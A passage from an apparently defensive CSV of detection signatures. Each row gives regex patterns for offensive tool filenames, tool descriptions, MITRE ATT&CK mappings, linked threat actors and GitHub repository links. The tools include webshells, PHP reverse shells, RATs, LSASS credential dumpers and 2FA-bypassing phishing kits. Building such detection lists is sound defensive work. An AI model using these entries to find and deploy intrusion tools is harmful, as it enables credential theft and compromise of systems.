COLDRIVER","Phishing","https://github.com/An0nUD4Y/Evilginx-Phishing-Infra-Setup","1","0","#linux","N/A","10","4","391","67","2024-12-12T04:13:02Z","2024-06-08T10:19:45Z","9668" "*/PhishingServer/*",".{0,1000}\/PhishingServer\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","9669" "*/phishlets/example.yaml*",".{0,1000}\/phishlets\/example\.yaml.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","1","#linux","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","9670" "*/php_custom_spy_for_mysql.php*",".{0,1000}\/php_custom_spy_for_mysql\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9671" 
"*/php_reverse_shell.php*",".{0,1000}\/php_reverse_shell\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","9672" "*/php_webshell.py*",".{0,1000}\/php_webshell\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9673" "*/php-backdoor.php*",".{0,1000}\/php\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","N/A","10","","N/A","","","","9674" "*/php-backdoor.php*",".{0,1000}\/php\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9675" "*/phpkit.py*",".{0,1000}\/phpkit\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9676" "*/phpkitcli.py*",".{0,1000}\/phpkitcli\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - 
T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9677" "*/PHPRemoteView.php*",".{0,1000}\/PHPRemoteView\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9678" "*/php-reverse-shell.git*",".{0,1000}\/php\-reverse\-shell\.git.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","9679" "*/php-reverse-shell/releases/*",".{0,1000}\/php\-reverse\-shell\/releases\/.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","9680" "*/php-reverse-shell/zipball/*",".{0,1000}\/php\-reverse\-shell\/zipball\/.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","9681" "*/phpshell.php*",".{0,1000}\/phpshell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - 
T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9682" "*/phpsploit.git*",".{0,1000}\/phpsploit\.git.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","9683" "*/phpsploit-config*",".{0,1000}\/phpsploit\-config.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#linux","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","9684" "*/PHPSPY.php*",".{0,1000}\/PHPSPY\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9685" "*/PHVNC.exe*",".{0,1000}\/PHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","9686" "*/physmem2minidump.py*",".{0,1000}\/physmem2minidump\.py.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a 
target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","1","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","9687" "*/physmem2profit.git*",".{0,1000}\/physmem2profit\.git.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","1","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","9688" "*/PickleC2.git*",".{0,1000}\/PickleC2\.git.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","9689" "*/pico_plus_user.sql*",".{0,1000}\/pico_plus_user\.sql.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","9690" "*/pid:1337 */dll:*",".{0,1000}\/pid\:1337\s.{0,1000}\/dll\:.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","9691" "*/PILOT/ATC.py*",".{0,1000}\/PILOT\/ATC\.py.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed 
for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","1","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","9692" "*/PILOT/PILOT.ps1*",".{0,1000}\/PILOT\/PILOT\.ps1.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","1","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","9693" "*/ping6.py*",".{0,1000}\/ping6\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9694" "*/PingRAT.git*",".{0,1000}\/PingRAT\.git.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","1","N/A","N/A","10","10","416","55","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z","9698" "*/pipe/RustPotato*",".{0,1000}\/pipe\/RustPotato.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","#content #namedpipe","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","9699" "*/PipeViewer.exe*",".{0,1000}\/PipeViewer\.exe.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","9700" "*/PipeViewer.git*",".{0,1000}\/PipeViewer\.git.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","9701" "*/PipeViewer.sln*",".{0,1000}\/PipeViewer\.sln.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","9702" "*/PipeViewer/Program.cs*",".{0,1000}\/PipeViewer\/Program\.cs.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - 
TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","9703" "*/pitty_tiger.profile*",".{0,1000}\/pitty_tiger\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","9704" "*/pivotnacci.git*",".{0,1000}\/pivotnacci\.git.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","9705" "*/pivotnaccilib*",".{0,1000}\/pivotnaccilib.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","#linux","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","9706" "*/pixiewps --*",".{0,1000}\/pixiewps\s\-\-.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#linux","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","9707" "*/pixiewps/archive/master.zip*",".{0,1000}\/pixiewps\/archive\/master\.zip.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","1","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","9708" "*/pjl-info-config.nse*",".{0,1000}\/pjl\-info\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","N/A","7","627","59","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z","9709" "*/pjl-ready-message.nse*",".{0,1000}\/pjl\-ready\-message\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9710" "*/pkg/merlin.go*",".{0,1000}\/pkg\/merlin\.go.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","9711" "*/PKINITtools*",".{0,1000}\/PKINITtools.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","9712" "*/Plasma RAT.exe*",".{0,1000}\/Plasma\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT 
samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","9713" "*/Plazmaz/LNKUp*",".{0,1000}\/Plazmaz\/LNKUp.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","9714" "*/Plugins/HRDP.dll*",".{0,1000}\/Plugins\/HRDP\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","9715" "*/Plugins/HVNC.dll*",".{0,1000}\/Plugins\/HVNC\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","9716" "*/Plugins/PreventSleep.dll*",".{0,1000}\/Plugins\/PreventSleep\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - 
T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","9717" "*/pngZIP.ps1*",".{0,1000}\/pngZIP\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#linux","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","9718" "*/POC/driverdump/*",".{0,1000}\/POC\/driverdump\/.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privileged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","9719" "*/PoC/PrivilegeEscalation*",".{0,1000}\/PoC\/PrivilegeEscalation.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","N/A","8","2","138","25","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z","9720" "*/POC_DLL.vcxproj*",".{0,1000}\/POC_DLL\.vcxproj.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses a userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","9721" 
"*/PoC-CVE-2023-21554*",".{0,1000}\/PoC\-CVE\-2023\-21554.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Exploitation tool","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","network exploitation tool","N/A","","N/A","","","","9722" "*/poisoners/*.py",".{0,1000}\/poisoners\/.{0,1000}\.py","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","9723" "*/Poisoners-Session.log*",".{0,1000}\/Poisoners\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#linux","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","9724" "*/polenum.py*",".{0,1000}\/polenum\.py.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","#linux","N/A","8","10","N/A","N/A","N/A","N/A","9725" "*/PoolParty.cpp*",".{0,1000}\/PoolParty\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","9726" 
"*/PoolParty.exe*",".{0,1000}\/PoolParty\.exe.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","9727" "*/PoolParty.git*",".{0,1000}\/PoolParty\.git.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","9728" "*/PoolParty.hpp*",".{0,1000}\/PoolParty\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","9729" "*/PoolParty.sln*",".{0,1000}\/PoolParty\.sln.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","9730" "*/PoolParty.vcxproj*",".{0,1000}\/PoolParty\.vcxproj.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","9731" "*/PoolPartyBof.c*",".{0,1000}\/PoolPartyBof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A 
